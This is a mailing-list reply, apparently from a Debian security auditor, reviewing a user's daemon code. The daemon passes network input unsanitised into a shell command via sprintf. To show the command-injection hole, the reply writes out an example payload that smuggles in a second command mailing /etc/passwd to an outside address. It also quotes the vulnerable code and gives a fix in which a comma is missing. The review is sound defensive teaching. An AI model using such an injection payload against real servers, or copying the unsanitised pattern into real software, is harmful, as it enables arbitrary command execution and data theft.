Re: SOLVED: Daemon Programming

[Steve Kemp <skx@debian.org>]

On Thu, Jan 13, 2005 at 09:41:29PM -0600, Sergio Cu?llar Vald?s wrote:
> Marc, thanks that was the problem !!!
> 
> sprintf(message, "say -s 4 -a \"%s\"", buffer);  < this was the big
> big big mistake

  It certainly was.

> I added the hole path to the instructions:
> 
> sprintf(message, "/usr/local/bin/say -s 4 -a \"%s\"", buffer);
> 
> Thanks to all of you who helped me !!  :-)

  You deamonize.  You open a socket.  You read input from that
 socket - carefully avoiding buffer overflows - then you run the
 command:

  /usr/local/bin/say -s 4 -a "the text you read"


  Firstly you don't avoid a simple buffer overflow.  Although 
 you have two buffers, 'buffer' for receiving the message from
 the network and 'message' for running the command are both the
 same size you don't account for the extra characters when you're
 copying:

sprintf(message, "say -s 4 -a \"%s\"", buffer);

  At least change that to:

snprintf(message, sizeof(message) "say -s 4 -a \"%s\"", buffer);

  Secondly, and this is the biggie, you don't quote or process the
 characters which are read from the network.

  Consider what would happen if a malicious user sent this:

"; cat /etc/passwd | mail l33thack0r@hotmail.com ; echo "

  You would run this commend:

/usr/local/bin/say -s 4 -a ""; cat /etc/passwd | mail ... ; echo ""


  Effectively you're allowing any user who can connect to your server
 to execute arbitary commands.  If this is started by init you're likely
 running as root too.

  Check that the characters you read from the network are only
 [a-zA-Z ] and you're probably OK.

Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit